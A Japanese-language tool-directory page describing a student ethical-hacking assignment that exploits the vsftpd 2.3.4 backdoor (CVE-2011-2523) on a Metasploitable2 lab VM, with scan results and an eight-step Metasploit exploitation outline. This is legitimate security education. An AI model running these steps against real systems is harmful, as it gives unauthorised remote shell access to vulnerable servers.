Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/chathura123git/ethical-hacking-cve-2011-2523
脆弱性分析エクスプロイトCTFペネトレーションテスト学習と教育ラボと実践
GitHubchathura123git/ethical-hacking-cve-2011-2523

ethical-hacking-CVE-2011-2523

倫理的ハッキング評価 | Kali Linux & Metasploitを使用したMetasploitable2上のvsftpd 2.3.4バックドア(CVE-2011-2523)の実践的な脆弱性テスト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
2ヶ月前未レビュー

倫理的ハッキング | 評価課題1

実践的な脆弱性テスト - CVE-2011-2523 (vsftpd 2.3.4 バックドア)

モジュール: - 倫理的ハッキング 大学: London Metropolitan University プログラム: BSc (Hons) Cyber Security and Forensic Science

法的免責事項

すべての活動は教育目的のみの制御された隔離された仮想ラボで実施されました。実際のシステムは対象としていません。すべての作業は1990年コンピュータ乱用法に準拠しています。

ラボ環境

  • 攻撃側OS: Kali Linux (ホスト)
  • 攻撃側IP: 192.168.56.1 (vboxnet0)
  • ターゲットVM: Metasploitable2
  • ターゲットIP: 192.168.56.103
  • ハイパーバイザー: Oracle VirtualBox
  • ネットワークモード: ホストオンリー (vboxnet0)

選択したCVE - CVE-2011-2523

  • CVE ID: CVE-2011-2523
  • 影響を受けるソフトウェア: vsftpd 2.3.4
  • 影響を受けるポート: 21/tcp (FTP)
  • CVSS v3スコア: 9.8 クリティカル
  • 攻撃ベクトル: ネットワーク
  • 必要な権限: なし
  • 参照: https://nvd.nist.gov/vuln/detail/CVE-2011-2523

Nmapスキャン結果

ポート21/tcp - vsftpd 2.3.4 (ターゲット) ポート22/tcp - OpenSSH 4.7p1 ポート23/tcp - Linux telnetd ポート80/tcp - Apache httpd 2.2.8 ポート139/tcp - Samba smbd 3.X ポート445/tcp - Samba smbd 3.X ポート3306/tcp - MySQL 5.0.51a ポート6667/tcp - UnrealIRCd

悪用の概要

Step 1: nmap -sn 192.168.56.0/24 Step 2: nmap -sV 192.168.56.103 Step 3: msfconsole Step 4: use exploit/unix/ftp/vsftpd_234_backdoor Step 5: set RHOSTS 192.168.56.103 Step 6: set LHOST 192.168.56.1 Step 7: run Step 8: id && whoami

参考文献

  • MITRE (2011) CVE-2011-2523. https://www.cve.org/CVERecord?id=CVE-2011-2523
  • NIST (2019) NVD CVE-2011-2523. https://nvd.nist.gov/vuln/detail/CVE-2011-2523
ツールをダウンロード